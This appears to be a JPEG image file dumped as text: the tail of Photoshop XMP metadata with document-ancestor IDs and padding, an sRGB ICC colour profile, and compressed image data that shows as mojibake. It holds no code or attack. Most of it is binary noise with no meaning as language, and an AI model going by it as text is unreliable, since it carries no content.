<rdf:li>xmp.did:175F8B652C206811871F9C3F3A8A1C0E</rdf:li> <rdf:li>xmp.did:19935B1B1220681197A5BE68DAE7D805</rdf:li> <rdf:li>xmp.did:1F4D49570D206811871FD1AC750C6933</rdf:li> <rdf:li>xmp.did:1F8418E30B20681188C6C166A936D6B2</rdf:li> <rdf:li>xmp.did:2218759B2920681192B0B98D384CD452</rdf:li> <rdf:li>xmp.did:22E7387B1020681188C6D82FD9EEA035</rdf:li> <rdf:li>xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00</rdf:li> <rdf:li>xmp.did:39EDD137112068118A6DD596BA142545</rdf:li> <rdf:li>xmp.did:420BC2ED4A206811871FB39F81FAECA2</rdf:li> <rdf:li>xmp.did:456DCAAC0A20681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:4A6880BA172068118A6DE215332FC54A</rdf:li> <rdf:li>xmp.did:4EC83EA60C206811871FF2AB4335B888</rdf:li> <rdf:li>xmp.did:5A53435130206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:6b6c8a71-1c2a-4226-8a5b-05c8742922ca</rdf:li> <rdf:li>xmp.did:706982fc-7d98-40e8-af5c-34d725b5fae1</rdf:li> <rdf:li>xmp.did:707FC7D22F206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:748206EDA31DE9119725FED0EB7940B5</rdf:li> <rdf:li>xmp.did:76D4B8C310206811943DE82709197D15</rdf:li> <rdf:li>xmp.did:7911307E13206811871FC6751E16770B</rdf:li> <rdf:li>xmp.did:7D1099985A206811871F8776FCDA7166</rdf:li> <rdf:li>xmp.did:7DB3BE00292068118A6D84548B7B40A0</rdf:li> <rdf:li>xmp.did:81A7D5F82A206811871FC47841645D57</rdf:li> <rdf:li>xmp.did:859F05911120681188C6C1527B0156A2</rdf:li> <rdf:li>xmp.did:863A0FC29F3AE811BD0DBED084B8F5A4</rdf:li> <rdf:li>xmp.did:867D40201F20681192B0BD9018AEE708</rdf:li> <rdf:li>xmp.did:8685A3F7322068119109C2E60CCDE007</rdf:li> <rdf:li>xmp.did:885D621F1720681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:9751854B10206811871FFB0658B2D2AF</rdf:li> <rdf:li>xmp.did:C1DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:C4DE8EBF0F2068118A6DA044F0577970</rdf:li> <rdf:li>xmp.did:CDEFD3061220681192B0F75C6E6D61CB</rdf:li> <rdf:li>xmp.did:CF33DBC20D20681188C6F5FBAB6EEDBA</rdf:li> <rdf:li>xmp.did:D4B0CF55162068118C14B2857F8C4C6C</rdf:li> <rdf:li>xmp.did:E25EBE490A2068118C14EFCE47AE8D3F</rdf:li> <rdf:li>xmp.did:E71424F945206811A7BADFC90BDD9E59</rdf:li> <rdf:li>xmp.did:EA2E99433520681188C6819A55480162</rdf:li> <rdf:li>xmp.did:ECE9CB841020681192B0AC59354E4128</rdf:li> <rdf:li>xmp.did:F409F9F123206811871FCD752812035C</rdf:li> <rdf:li>xmp.did:F4F6D7D84C20681188C6F428C73A5134</rdf:li> <rdf:li>xmp.did:F77F11740720681197CFB2669E13D7A6</rdf:li> <rdf:li>xmp.did:F866F6662B20681188C6CF690D9A65F5</rdf:li> <rdf:li>xmp.did:F8D31357D8A111E492B4A31594B6DD98</rdf:li> <rdf:li>xmp.did:FE7F11740720681188C6A9BCC052530E</rdf:li> <rdf:li>xmp.did:da422971-04e3-d046-ad90-462cb7d1b2d0</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 <?xpacket end="w"?>ÿâXICC_PROFILEHLinomntrRGB XYZ Î	1acspMSFTIEC sRGBöÖÓ-HP  cprtP3desc„lwtptðbkptrXYZgXYZ,bXYZ@dmndTpdmddĈvuedL†viewÔ$lumiømeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ óQÌXYZ XYZ o¢8õXYZ b™·…ÚXYZ $ „¶ÏdescIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view¤þ_.ÏíÌ\žXYZ L	VPWçmeassig CRT curv
          #(-27;@EJOTY^chmrw|†‹•šŸ¤©®²·¼ÁÆËÐÕÛàåëðöû
          %+28>ELRY`gnu|ƒ‹’š¡©±¹ÁÉÑÙáéòú&/8AKT]gqz„Ž˜¢¬¶ÁËÕàëõ!-8COZfr~Š–¢®ºÇÓàìù -;HUcq~Œš¨¶ÄÓáðþ
          +:IXgw†–¦µÅÕåö'7HYj{Œ¯ÀÑãõ+=Oat†™¬¿Òåø2FZn‚–ª¾Òçû		%	:	O	d	y		¤	º	Ï	å	û
          
          '
          =
          T
          j
          
          ˜
          ®
          Å
          Ü
          ó"9Qi€˜°Èáù*C\uŽ§ÀÙó
          
          
          &
          @
          Z
          t
          Ž
          ©
          Ã
          Þ
          ø.Id›¶Òî	%A^z–³Ïì	&Ca~›¹×õ1OmŒªÉè&Ed„£Ãã#Ccƒ¤Åå'Ij‹­Îð4Vx›½à&Il²ÖúAe‰®Ò÷@eНÕú Ek‘·Ý*QwžÅì;cвÚ*R{£ÌõGp™Ãì@j”¾é>i”¿ê  A l ˜ Ä ð!!H!u!¡!Î!û"'"U"‚"¯"Ý#
          #8#f#”#Â#ð$$M$|$«$Ú%	%8%h%—%Ç%÷&'&W&‡&·&è''I'z'«'Ü(
          (?(q(¢(Ô))8)k))Ð**5*h*›*Ï++6+i++Ñ,,9,n,¢,×--A-v-«-á..L.‚.·.î/$/Z/‘/Ç/þ050l0¤0Û11J1‚1º1ò2*2c2›2Ô3
          3F33¸3ñ4+4e4ž4Ø55M5‡5Â5ý676r6®6é7$7`7œ7×88P8Œ8È99B99¼9ù:6:t:²:ï;-;k;ª;è<'<e<¤<ã="=a=¡=à> >`> >à?!?a?¢?â@#@d@¦@çA)AjA¬AîB0BrBµB÷C:C}CÀDDGDŠDÎEEUEšEÞF"FgF«FðG5G{GÀHHKH‘H×IIcI©IðJ7J}JÄKKSKšKâL*LrLºMMJM“MÜN%NnN·OOIO“OÝP'PqP»QQPQ›QæR1R|RÇSS_SªSöTBTTÛU(UuUÂVV\V©V÷WDW’WàX/X}XËYYiY¸ZZVZ¦Zõ[E[•[å\5\†\Ö]']x]É^^l^½__a_³``W`ª`üaOa¢aõbIbœbðcCc—cëd@d”dée=e’eçf=f’fèg=g“géh?h–hìiCišiñjHjŸj÷kOk§kÿlWl¯mm`m¹nnknÄooxoÑp+p†pàq:q•qðrKr¦ss]s¸ttptÌu(u…uáv>v›vøwVw³xxnxÌy*y‰yçzFz¥{{c{Â|!||á}A}¡~~b~Â#„å€G€¨
          kÍ‚0‚’‚ôƒWƒº„„€„ã…G…«††r†×‡;‡ŸˆˆiˆÎ‰3‰™‰þŠdŠÊ‹0‹–‹üŒcŒÊ1˜ÿŽfŽÎ6žnÖ‘?‘¨’’z’ã“M“¶” ”Š”ô•_•É–4–Ÿ—
          —u—à˜L˜¸™$™™üšhšÕ›B›¯œœ‰œ÷dÒž@ž®ŸŸ‹Ÿú i Ø¡G¡¶¢&¢–££v£æ¤V¤Ç¥8¥©¦¦‹¦ý§n§à¨R¨Ä©7©©ªª««u«é¬\¬Ð­D­¸®-®¡¯¯‹°°u°ê±`±Ö²K²Â³8³®´%´œµµŠ¶¶y¶ð·h·à¸Y¸Ñ¹J¹Âº;ºµ».»§¼!¼›½½¾
          ¾„¾ÿ¿z¿õÀpÀìÁgÁãÂ_ÂÛÃXÃÔÄQÄÎÅKÅÈÆFÆÃÇAÇ¿È=ȼÉ:ɹÊ8Ê·Ë6˶Ì5̵Í5͵Î6ζÏ7ϸÐ9кÑ<ѾÒ?ÒÁÓDÓÆÔIÔËÕNÕÑÖUÖØ×\×àØdØèÙlÙñÚvÚûۀÜ܊ÝݖÞÞ¢ß)߯à6à½áDáÌâSâÛãcãëäsäü儿
          æ–çç©è2è¼éFéÐê[êåëpëûì†ííœî(î´ï@ïÌðXðåñrñÿòŒóó§ô4ôÂõPõÞömöû÷Šøø¨ù8ùÇúWúçûwüü˜ý)ýºþKþÜÿmÿÿÿîAdobed@ÿۄÿÀv°ÿÝ–ÿÄ¢	
          	
          	u!"1A2#	QBa$3Rqb‘%C¡±ð&4r
          ÁÑ5'áS6‚ñ’¢DTsEF7Gc(UVW²ÂÒâòdƒt“„e£³ÃÓã)8fóu*9:HIJXYZghijvwxyz…†‡ˆ‰Š”•–—˜™š¤¥¦§¨©ª´µ¶·¸¹ºÄÅÆÇÈÉÊÔÕÖרÙÚäåæçèéêôõö÷øùúm!1"AQ2aqB#‘R¡b3	±$ÁÑCrðá‚4%’ScDñ¢²&5T6Ed'
          sƒ“FtÂÒâòUeuV7„…£³ÃÓãó)”¤´ÄÔäô•¥µÅÕåõ(GWf8v†–¦¶ÆÖæögw‡—§·Ç×ç÷HXhxˆ˜¨¸ÈØèø9IYiy‰™©¹ÉÙéù*:JZjzŠšªºÊÚêúÿÚ?Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷suW_ÎÔ{Ç~í¬z¨gÆTd¢›,ˆÀ2»â©>ã"ˆàðÆ ãÚëm³p¼­­Ó֘ý¦ƒùõ`¬xƒ¯önþ9ÿÏÏÆç£sõ“Úßêæõÿ(-þô¿ô[ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðõïönþ9ÏÏÆç£sõ“ß¿«›×ü ·ûÒÿÐ]{ÃáëßìÝürÿŸŸŒÿÏFæÿë'¿W7¯ùAo÷¥ÿ º÷†ÿÃ׿ٻøåÿ??ÿžÍÿÖO~þ®o_ò‚ßïKÿAuï
          ÿ‡¯³wñËþ~~3ÿ=›ÿ¬žýý\Þ¿å¿Þ—þ‚ëÞÿ^ÿfïã—üüügþz77ÿY=ûú¹½Ê½/ý×¼7þ½þÍßÇ/ùùøÏüônoþ²{÷õszÿ”ÿz_ú¯xoü={ý›¿Ž_óóñŸùèÜßýd÷ïêæõÿ(-þô¿ô^ðßøz÷û7¿ççã?óѹ¿úÉïßÕÍëþP[ýéè.½á¿ðô½ÚßÔ{öª:
          ¥Ø;g/‘›ˆqi‘Ž“+=¾¿o‹È
          L„ú:#k~}£¹Ú÷E/qg"§­*?h¨þ}h£+ЩíUëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ê¶¾cüªÊíúž§ë\‹có‘Á÷¿tQÉjÌOÝD²ÅƒÃN¼ÓdššEzŠ•õÀR2²ë1¹o`Žáp¾JÅ^Å<
          ?zŠð|N8½uînTäÓMS4µËQQ<4óÍ#Ë4ÒÈÅä–Y\³É$ŽIf$’MϹ ¥b÷¾½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ú£×¯uï~¨õëÝ{ߪ=z÷^÷ê^½×½ê£­õï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uï~¨ëÝ{ߪ:÷^÷ꎽ׽ú£¯uÉãt’7h䍕Ñъº:ÊèÊC++‚9߉Pðë]Z?œ¦cԝ›”—)&BÔ»/td%2d
          j)1mìÍ\„½wÞ*‘IQ!3y­òGãó&ÁFû…Ši¦]G
          *yŽÎ(jđþ%êÑ=:c¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¨õU	IKSU %) š¡Àú”†6‘€úóe÷µ™Tq'¯u¬~=_¹s¹Å–ª2™Ü¥~_!;j&Z̍Tµu/ÍÈYM‡àqîp†QC¤h °
          —pë/”ÍÖGŽÂãr|„«#ÅC‹¢©ÈVJ±#I+GKI³ºÇ–bÙA'vv®§p«êM[ãÃ¥Oú2ìŸù÷›çÿAÁÿÖÿm}M·ü¤Gþô?ÏÖè}^ÿF]“ÿ>ó|ÿè#¸?úßïßSmÿ)ÿ½óõêC׿їdÿϼß?úîþ·û÷ÔÛÊDïCüýz‡Ðõ×ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒ»+þ}ÞúÿÐK?ÿÔýõ6ßò“ûÐÿ?^¡ô={ývWüû½õÿ –ÿ¨=ûêm¿å&?÷¡þ~½Cèz÷ú2ì¯ù÷{ëÿA,ÿÿP{÷ÔÛÊLïCüýz‡ÐõïôeÙ_óî÷×þ‚Yÿþ ÷ï©¶ÿ”˜ÿއùúõ¡ëßè˲¿çÝï¯ý³ÿýAïßSmÿ)1ÿ½óõêC׿їeÏ»ß_ú	gÿúƒß¾¦ÛþRcÿzçëÔ>‡¯£.ÊÿŸw¾¿ôÏÿõ¿}M·ü¤Çþô?Ïר}^ÿF]•ÿ>ï}è%Ÿÿê~ú›oùIý蟯Pú½þŒû+þ}ÞúÿÐK?ÿÖóïßSmÿ)1ÿ½óõê7ðžºÿF}—ÿ>ë|ÿè'Ÿÿë½ýM¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýö_üû­óÿ žÿ­þýõ6¿ò“ûÐÿ?^£	ëßèϲÿçÝoŸýóÿýo÷冀ÿ”˜ÿއùúõøO^ÿF}—ÿ>ë|ÿè'Ÿÿë¿}M¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýö_üû­óÿ žÿ­þýõ6¿ò“ûÐÿ?^£	ëßèϲÿçÝoŸýóÿýo÷冀ÿ”˜ÿއùúõøO^ÿF}—ÿ>ë|ÿè'Ÿÿë¿}M¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýö_üû­óÿ žÿ­þýõ6¿ò“ûÐÿ?^£	ëßèϲÿçÝoŸýóÿýo÷冀ÿ”˜ÿއùúõøO^ÿF}—ÿ>ë|ÿè'Ÿÿë¿}M¯ü¤Çþô?ÏרßÂz÷ú3ì¿ù÷[çÿA<ÿÿ[ýûêmå&?÷¡þ~½Fþ׿џeÿϺß?ú	çÿúßïßSkÿ)1ÿ½óõê7ðž½þŒû/þ}ÖùÿÐO?ÿÖÿ~ú›_ùIý蟯Q¿„õïôgÙóî·Ïþ‚yÿþ·û÷ÔÚÿÊLïCüýzü'¯£>ËÿŸu¾ôÏÿõ¿ß¾¦×þRcÿzçëÔoá={ýögüû½óÿ –ÿ­þýõ6¿ò“ûÐÿ?^£zºÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½^ÿF]™ÿ>ï|è%Ÿÿê~ú›_ùIý蟯Q½Iœ¶5€«ûî#%…®1$â-AWŽ«0ÈXG7ÛÖEÞ'(@kXmôöê4r
          Q¸eõðu¬Ž#¨ÔÌeuJ‚w¤¯ÇÕS×QUBJËMWI2OMQfHfYOà{xÑՑÅPŠêµÖÍ;S3ýãÚûopè	ü{‡Ìè_ҟÅ1ÔÕÚø/žÞáˆ¼ç‡ø¯ì$tˆŠ:öÏZëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦¬çüY3ö«Èî$Þ܋ûXÿÓðõîµ÷9jùt¿£ñ‡þgþ 